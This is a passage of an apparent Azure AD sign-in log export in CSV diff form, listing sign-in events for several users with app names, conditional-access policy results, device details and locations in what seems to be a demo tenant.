'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce31861000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,5f11d930-41ca-43a7-b362-f3ce31861000,SigninLogs,Sucess,33.7984581,-84.38828278
+1976,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:57.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ec5abf81-2cbb-48b3-87dd-14fdc230e5d1,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",1fc6d415-116e-44c9-a4fc-b8ef84b81100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1fc6d415-116e-44c9-a4fc-b8ef84b81100,SigninLogs,Sucess,38.73078156,-78.17196655
+1977,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:17.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6c606e38-e2ec-45b7-8e5f-d5702bed042f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f84cfb21100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ec85dd07-c5e8-494c-aa5b-3f84cfb21100,SigninLogs,Sucess,33.7984581,-84.38828278
+1978,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:34.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,70c6cc5f-bf5b-4d2a-8a37-a6af696d5822,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8484b51100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f8484b51100,SigninLogs,Sucess,33.7984581,-84.38828278
+1979,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f3250c13-b952-476d-b4e2-6446749c2953,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,NL,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Exchange Online PowerShell,[],notApplied,08/04/2020 15:00,{'deviceId': ''},71693871-d407-425c-bffa-acefcfeb0e00,,,"{'countryOrRegion': 'NL', 'geoCoordinates': {'longitude': 4.940189838409424, 'latitude': 52.309051513671875}, 'state': 'Noord-Holland', 'city': 'Amsterdam'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,71693871-d407-425c-bffa-acefcfeb0e00,SigninLogs,Sucess,52.30905151,4.940189838
+1980,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:19.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:11,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",f2f595af-13f7-418e-8782-0531ab044700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f2f595af-13f7-418e-8782-0531ab044700,SigninLogs,Sucess,40.75891113,-73.97901917
+1981,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:01.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,477fe157-e63b-449c-93f6-3b6334f04061,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41b70c69-9711-4381-8dc3-5fd66b941000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41b70c69-9711-4381-8dc3-5fd66b941000,SigninLogs,Sucess,33.7984581,-84.38828278
+1982,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,64377d85-3321-4480-a098-f0aed15f13a9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41b70c69-9711-4381-8dc3-5fd6f99b1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,41b70c69-9711-4381-8dc3-5fd6f99b1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1983,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,40:02.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3297570-1392-4152-84ae-79e988ad8010,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:40,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f4c49c86-cb9e-4a04-9dcc-1dcdcda91000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f4c49c86-cb9e-4a04-9dcc-1dcdcda91000,SigninLogs,Sucess,41.90428925,-85.99833679
+1984,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:33.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d35a04a6-36b3-4e15-8e78-455c3af1dad9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 